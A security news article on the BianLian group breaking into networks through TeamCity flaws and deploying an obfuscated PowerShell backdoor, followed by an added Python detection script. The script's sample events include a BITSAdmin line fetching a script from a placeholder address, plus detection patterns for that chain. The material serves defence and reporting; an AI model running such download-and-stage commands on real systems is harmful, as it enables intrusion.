BianLian group exploits TeamCity again, deploys PowerShell backdoor

The BianLian extortion group was recently seen exploiting vulnerabilities in the TeamCity continuous integration server to gain initial access to networks. In the latest attacks, the group also deployed a previously unknown backdoor written in PowerShell that appears to be a reimplementation of its older Golang backdoor.

“As we have seen throughout 2023 and into 2024, BianLian continues to prove how they can adapt to a changing environment, especially in regards to the exploitation of emerging vulnerabilities,” researchers from GuidePoint Security said in a new report.

BianLian is a ransomware group that emerged in 2022 and has primarily targeted organizations in the healthcare, manufacturing, professional, and legal services sectors in the US and Europe. The group originally used double extortion tactics, but it switched to operations that involve only data leak extortion after researchers released a decryptor for its file-encrypting program.

TeamCity as initial access vector

According to an analysis by researchers at Palo Alto Networks, BianLian has consistently been in the top 10 data extortion groups, with new victims posted on its leak site every week. The group has used various methods of gaining initial access to networks, including stolen Remote Desktop Protocol (RDP) credentials, exploiting known vulnerabilities such as ProxyShell, and targeting VPN providers.

During a recent investigation in a customer environment, GuidePoint’s incident response team determined that BianLian attackers broke in by exploiting a vulnerability in TeamCity, a commercial CI/CD tool developed by JetBrains that’s used to automate the building and testing of software code. Because the logs were missing from the server, the GuidePoint researchers didn’t manage to determine if the vulnerability was one of the two critical ones patched by JetBrains last week (CVE-2024-27198) or an older one patched last year (CVE-2023-42793).

What’s clear is that the exploit allowed the attackers to create new users in TeamCity and execute malicious commands on the underlying system with the privileges of TeamCity’s service account. Native Windows commands were then used to perform further reconnaissance and discover other software build servers on the network that could be targeted.

“The threat actor leveraged two files, winpty-agent.exe and winpty.dll to the build servers, which are legitimate files for winpty used to create an interface to run Windows commands,” the researchers said. “The threat actor used winpty-agent.exe on the build servers to remotely run commands from the exploited TeamCity server and leveraged BITSAdmin to deploy additional tools, including a malicious PowerShell script, web.ps1, to the server.”

Their attempts to dump credentials from the Windows Security Accounts Manager (SAM) were flagged by the endpoint security monitoring solution and prompted an investigation by incident responders. The investigation revealed that before deploying the PowerShell script, the attackers tried to deploy several DLLs that were quarantined by the local antivirus because they matched Win64/BianDoor.D, a detection signature for the group’s known backdoor written in the Go programming language.
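The intrusion chain described above (TeamCity's service account spawning a shell, BITSAdmin fetching a script, winpty-agent.exe running from an unusual location) expressed as detection logic, as an added example that is not part of the GuidePoint report; the process-creation records are constructed, and the hostnames, paths and download address are invented.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields) modelled on
# the chain in the article. Hostnames, paths and the download address are invented.
SAMPLE_EVENTS = [
    {"host": "build01", "parent": r"C:\TeamCity\jre\bin\java.exe", "user": "NT SERVICE\\TeamCity",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": 'cmd.exe /c net group "Domain Computers" /domain'},
    {"host": "build01", "parent": r"C:\Windows\System32\cmd.exe", "user": "NT SERVICE\\TeamCity",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high http://203.0.113.10/web.ps1 C:\\ProgramData\\web.ps1"},
    {"host": "build02", "parent": r"C:\Windows\System32\cmd.exe", "user": "NT SERVICE\\TeamCity",
     "image": r"C:\ProgramData\winpty-agent.exe", "cmdline": "winpty-agent.exe --pipe"},
    {"host": "build02", "parent": r"C:\Windows\explorer.exe", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe readme.txt"},
]


def teamcity_spawns_shell(e):
    """TeamCity's JVM or service account launching an interactive shell (post-exploit command execution)."""
    parent_is_teamcity = "teamcity" in e["parent"].lower() or "teamcity" in e["user"].lower()
    return parent_is_teamcity and e["image"].lower().endswith(("\\cmd.exe", "\\powershell.exe"))


def bitsadmin_fetches_script(e):
    """BITSAdmin used as a downloader for a script or binary (the web.ps1 delivery step)."""
    if not e["image"].lower().endswith("\\bitsadmin.exe"):
        return False
    return re.search(r"/transfer\b.*https?://\S+\.(ps1|exe|dll)\b", e["cmdline"], re.I) is not None


def winpty_agent_outside_dev_tools(e):
    """winpty-agent.exe is legitimate tooling, but it rarely belongs under ProgramData, Temp or Public."""
    img = e["image"].lower()
    staging = ("\\programdata\\", "\\temp\\", "\\users\\public\\")
    return img.endswith("\\winpty-agent.exe") and any(s in img for s in staging)


RULES = {
    "teamcity_service_spawns_shell": teamcity_spawns_shell,
    "bitsadmin_fetches_script": bitsadmin_fetches_script,
    "winpty_agent_outside_dev_tools": winpty_agent_outside_dev_tools,
}


def evaluate(events):
    """Return (host, rule_name) pairs for every record that matches a rule."""
    return [(e["host"], name) for e in events for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for host, rule in evaluate(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Each rule alone produces noise in a real estate; correlating them on the same host within a short window, as the records above would, is what makes the chain stand out.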

PowerShell reimplementation of the BianLian backdoor

The PowerShell script was highly obfuscated, but the researchers managed to deobfuscate it and analyze its contents. The script had two main functions: one called cakes, which implemented a mechanism for connecting to a command-and-control server using SSL streams and TCP sockets, and another called cookies, which implemented the rest of the backdoor’s execution logic and capabilities.

“Perhaps the most interesting component of this whole backdoor was the innovative use of the Runspace Pool in conjunction with the .NET PowerShell.Create() method to invoke a ScriptBlock with asynchronous capabilities, all while leveraging an SSL stream to pass data between the C2 server and the infected system,” the researchers said.

Most malicious PowerShell scripts rely on the Invoke-Command or Invoke-Expression PowerShell cmdlets to execute commands or code on the system. By avoiding these well-known techniques, BianLian’s script is more likely to avoid being flagged by security products. The Runspace Pool feature is also a more performant way to execute commands asynchronously.

BianLian’s Go backdoor uses digital certificates to authenticate the C2 server, and this behavior is replicated in the PowerShell script. Furthermore, the IP address the script connected to was already flagged as a known C2 server for BianLian’s Go backdoor, reinforcing the attribution to this group.

“Based on these findings of shared infrastructure and AV detections, GRIT assesses with a high confidence that the analyzed PowerShell script is a PowerShell implementation of the BianLian Go backdoor,” the GuidePoint researchers said.
